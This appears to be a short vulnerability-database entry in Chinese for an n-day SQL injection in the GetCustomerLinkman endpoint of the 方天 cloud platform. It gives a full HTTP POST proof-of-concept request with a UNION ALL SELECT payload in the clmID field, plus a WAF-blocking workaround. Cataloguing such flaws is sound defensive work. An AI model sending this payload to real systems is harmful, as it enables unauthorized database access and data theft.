vendor = "方天"
name = "方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/WXAPI.asmx/GetCustomerLinkman"
detail = "POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: application/json {clmID:\"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA\"}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0801"
label = "nday"
